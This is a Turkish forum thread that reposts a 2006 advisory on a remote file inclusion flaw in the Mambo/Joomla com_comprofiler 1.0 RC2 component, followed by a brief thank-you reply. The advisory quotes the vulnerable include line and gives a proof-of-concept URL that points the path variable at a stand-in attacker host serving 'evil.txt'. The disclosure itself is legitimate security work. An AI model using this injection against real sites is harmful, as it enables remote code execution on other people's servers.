Mambo/Joomla com_comprofiler v1.0 Güvenlik Açığı

Onur OKTAY
27-08-2006, 14:28   |  #1  
OP Yıllanmış Üye
Teşekkür Sayısı: 0
169 mesaj
Kayıt Tarihi:Kayıt: Şub 2006

Risk : Yüksek | Kritik

Etki : Uzaktan Kod Çalıştırma

Etkilenenler : joomla | mambo RC 2 v1.0

Yer/Kapsam : Remote

Zaman/Time : 25 Ağustos 2006

Etkilenen ve Güvenlik Açığının Bulunduğu Yazılım; com_comprofiler Components

Application : com_comprofiler

version : 1.0 RC 2

Güvenlik Açığının Meydana Geldiği Parametre; com_comprofiler klasörünün içindeki script plugin.class.php parametresi güvenlik açığının oluşmasına neden olmaktadır.

PHP;

<?php

/**

* Plugin handler

* @package Joomla

* @author various, JoomlaJoe and Beat

*/

require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' );

----------------------------------------------------------

Variables $mosConfig_absolute_path are not properly sanitized.

Proof Of Concept:

Exploit ( örnek kod saldırısı ) :

http://[hedefsite]/[path]/administrator/components/com_comprofiler/plugin.c
lass.php?mosConfig_absolute_path= http://atakyapılacaksite.com/evil.txt?

Advisory :  #nyubi (solpotcrew comunity) #jambihackerlink #e-c-h-o @ irc.dal.net

Security Adivosry by Onur OKTAY

TuncaBozkurt
27-08-2006, 15:02   |  #2  
Yıllanmış Üye
Teşekkür Sayısı: 0
4,805 mesaj
Kayıt Tarihi:Kayıt: Oca 2006

paylaşım için teşekkürler.